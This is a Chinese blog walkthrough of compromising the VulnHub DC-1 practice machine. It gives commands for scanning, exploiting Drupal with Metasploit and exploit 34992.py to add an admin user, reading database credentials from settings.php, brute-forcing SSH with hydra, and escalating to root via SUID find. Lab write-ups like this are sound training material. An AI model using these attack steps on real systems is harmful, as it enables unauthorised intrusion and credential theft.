DC-1渗透实战(详细过程)

已于 2022-11-03 17:20:03 修改
阅读量1k 收藏 6
点赞数 5
分类专栏: DC渗透实战 文章标签: 网络安全 安全 web安全 系统安全
于 2022-10-13 15:23:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39291229/article/details/127301687
版权

目录

DC-1靶场机

1.主机发现

2.端口探测

3.网页信息探测

4.敏感目录扫描

5.漏洞查找和利用

漏洞查找

漏洞利用

6.获取shell

获取交互式shell

7.数据库方向渗透

看库

看表

看列

8.利用漏洞添加admin权限用户

9.九头蛇密码爆破

10.SUID提权

root权限文件查看

DC-1靶场机

官网下载 https://download.vulnhub.com/dc/DC-1.zip

下载完成后 用虚拟机打开文件

 

提示导入失败,直接点重试,导入完成后,打开DC-1虚拟机并等待,过程中别点进虚拟机里面

通过配置之后

确保DC-1 和kali处在同一网段下

下面开始渗透实战

1.主机发现

arp-scan -l

通过对比mac地址 确认目标靶机IP为192.168.20.138

2.端口探测

nmap -sV -p- 192.168.20.138

-sV 扫描目标主机端口上运行的软件信息

-p- 扫描全部端口0-65535

3.网页信息探测

80端口提供http服务 是突破口 用浏览器访问看一下

192.168.20.138:80

用whatweb 查看站点信息

whatweb -v 192.168.20.138

扫出CMS信息 CMS为Drupal

总结得到如下信息

CMS是Drupal

Apache 2.2.22

PHP 5.4.45

jQuery 1.4.4

4.敏感目录扫描

dirsearch -u 192.168.20.138 -e *

暂时未找到可以利用的信息

5.漏洞查找和利用

知道CMS之后 可以去寻找相对应的漏洞 百度一下Drupal漏洞

还是有很多漏洞的

漏洞查找

直接上Metasploit

msfconsole

查找一下Drupal的漏洞

有很多漏洞 这里我选择2018年的漏洞 时间较新 等级也高

漏洞利用

选择漏洞 进入

查看该漏洞参数模块

Current Setting是目前设置的内容

Required表示是否需要设置内容,yes为必须设置,no可以设置也可不设置

上面RHOSTS需要set,但是没有内容

设置RHOSTS

检查

设置完毕 run开始攻击

攻击成功

6.获取shell

(1)获取普通shell

(2)ls查看

发现有个flag1.txt文件 尝试查看

提示说需要配置文件

继续深入探测

获取交互式shell

以普通用户登录

python -c 'import pty;pty.spawn("/bin/bash")'

查看有无flag文件

发现只有一个flag1 打开却需要配置文件

继续深入探测

根据之前的提示看一下配置文件,配置文件有一些重要信息,有时候还能提权

百度Drupal配置文件,名字叫settings.php

find / -name settings.php

找到配置文件后 打开文件

cat /var/www/sites/default/settings.php

发现flag2 和一个数据库登录的账户和密码

flag2并没有发现我们想要的

7.数据库方向渗透

用拿到的账户密码登录数据库

成功登录数据库

看库

show databases;

看表

use drupaldb;show tables;

查看可疑的表 users

看列

select * from users;

发现密码被加密了 暂时调转方向

8.利用漏洞添加admin权限用户

drupal在7.0版本有个SQL注入的漏洞,可以添加一个admin权限的用户,适用版本7.31以下,我们可以在msf找一下这个工具

searchsploit drupal

查看脚本路径

searchsploit 34992.py -p

通过URL下载脚本 保存到桌面

新建窗口运行脚本

python2 34992.py -t http://192.168.20.138/node?destination=node -u flag3 -p 123456
​

admin用户创建成功

登录之后查看信息

查看flag3信息

提示passwd文件和shadow文件有可疑信息

查看passwd文件 tac /etc/passwd

发现flag4用户

我们有两个方法拿到这个用户的密码,一个是爆破,另一个就是提权打开shadow文件查看密码

9.九头蛇密码爆破

hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.20.138

ssh连接

ssh flag@192.168.20.138

查看flag4文件

提示说用相同手法爆破其他flag 去考虑提权

10.SUID提权

root权限文件查看

find / -perm -4000 2>/dev/null

用可以执行root权限的find命令找查文件 来做到SUID提权

关于SUID提权:https://www.freebuf.com/articles/web/272617.html

find / -name index.php -exec "/bin/sh" \;

whoami 查看是否提权成功

直接进入root根目录 查看最终flag

成功通关!!!

tzyyyyyy
关注
  • 5
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
DC-1渗透靶场实战速通版
saber的博客
12-01 883
开启 Kali 和 DC靶机,确保二者互相可以ping通,Kali地址根据命令可以查找到,但是DC靶机我们是没有画面的,只是开启了一个环境,我们可以在虚拟机的设置里面找到。得出新的admin的密码后,又开始重复步骤,登录数据库,使用数据库语句修改指定表指定字段中的值,修改密码为我们123456加密后的值。回到终端,退出数据库,使用命令查看提示文件。
九头蛇安全测试工具(Hydra v9.1)
08-10
一款功能强大,目的合法,易于操作的安全测试工具 此Windows适用版本为Thomas D.提供的脚本,供大家研究学习之用 下载后直接解压至D盘即可(任意)
【工具-Hydra】暴力破解神器:Hydra-九头蛇
热门推荐
qqchaozai的专栏
11-21 2万+
前言 Hydra[ˈhaɪdrə],九头蛇,希腊神话中的怪兽,在网安工具中,是一款暴力破解的利器! 1 安装使用 Linux下载:https://github.com/vanhauser-thc/thc-hydra Windows下载:https://github.com/maaaaz/thc-hydra-windows 本文采用windows环境演示,下载后,解压,运行【hydra.e...
Hydra(九头蛇)工具使用
剁椒鱼头没剁椒的博客
01-03 1万+
hydra(九头蛇)是著名黑客组织thc的一款开源的暴力破解密码工具,功能非常强大,kali下是默认安装的,几乎支持所有协议的在线破解。密码能否破解,在于字典是否强大。
渗透入门:DC-1主机渗透详细教学
2301_77472496的博客
09-19 1112
DC系列靶场是一组专门为渗透测试而设计的易受攻击的实验室,共有九个靶场。它的目的是让初学者获得渗透测试领域的经验,但是它的难度取决于你的技能和知识,以及你的学习能力。
DC—1渗透实战
qq_23347209的博客
09-04 1110
Nmap(也就是Network Mapper,最早是Linux下的网络扫描和嗅探工具包)是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。Hydra是一款非常强大的暴力破解工具,它是由著名的黑客组织THC开发的一款开源暴力破解工具。Hydra是一个验证性质的工具,主要目的是:展示安全研究人员从远程获取一个系统认证权限。靶场下载地址:https://www.vulnhub.com/entry/dc-1,292/让其在根目录查找文件,并且执行bin/sh,就有root权限了。
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
vuInhub靶场实战系列-DC-9实战
最新发布
06-02
vuInhub靶场实战系列-DC-9实战
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
9.100个渗透测试实战#9(DC-4)
01-09
世间一切皆可努力  感谢浏览 目录   一、实验环境 二、实验流程 三、实验步骤 (一)信息收集——主机发现阶段 1.查看kali的网卡、IP等信息;(网卡名:eth0,IP地址:192.168.97.129) 2.查看靶机页面; 3.探测特
vuInhub靶场实战系列-DC-8实战
05-31
vuInhub靶场实战系列-DC-8实战
DC-1靶机渗透测试详细教程
啊醒的博客
05-04 5498
DC靶机系列渗透教程
DC-1靶场搭建及渗透实战详细过程DC靶场系列)
金 帛的博客
06-29 1万+
DC-1靶场渗透过程,写的有点多,把许多方法尽可能地列出来了,也参考了很多别的文章,希望对刚学习web渗透的小白有所帮助吧!
DC-2渗透实战详细过程
tzyyyyyy的博客
10-14 825
DC-2靶机渗透实战 利用各种姿势方法获取最终flag
Vulnhub-DC-1靶机渗透练习
weixin_52451257的博客
11-15 4193
DC-1 第一步:信息收集 nmap -sn 192.168.231.0/24 (进行存活主机发现) nmap -A -p- 192.168.231.142 (进行针对靶机的详细信息收集查看靶机开放了那些端口) dirb -http://192.168.231.142 nikto -h http://192.168.231.142 (敏感信息发现,cms是drupal7.0版本) 第二部:漏洞利用 msf 搜索关于drupal的相关漏洞. 我可能是歪打正着,上...
dc-1靶机渗透
qq_56805195的博客
07-08 792
一天一篇努力
Vulnhub DC-1靶机渗透攻击过程演练
zhongxj183的博客
11-29 3029
Vulnhub DC-1靶机渗透攻击过程演练 DC-1介绍 Vulnhub 社区上收集了很多由世界各地的安全爱好者提供的靶机环境,DC-1 就是其中之一。通过对靶机的攻击挑战,加强了解渗透攻击的过程思路,总结渗透测试经验。 在介绍中了解到,DC-1靶机总共有5个flag,最终目标是在root目录中找到并读取flag。可以不用root用户,但是需要root用户权限。 环境准备 序号 名称 用途 备注 1 DC-1靶机 受攻击主机 VMware环境部署 2 Kali 攻击主机 VMwar
Vulnhub靶机:DC-1渗透详细过程
IerkeU的博客
01-27 2738
这次练习的是vulnhub平台下的DC系列靶机第一台,下载地址为https://www.vulnhub.com/entry/dc-1,292。该靶机的难度系数为简单,其中有五个flag,我们在练习的过程中可以直接跳过其中以部分flag中的提示直接拿到root权限。
DC-5渗透测试教程详解
城下深蓝的博客
02-19 1041
DC-5渗透测试教程详解
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

tzyyyyyy

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值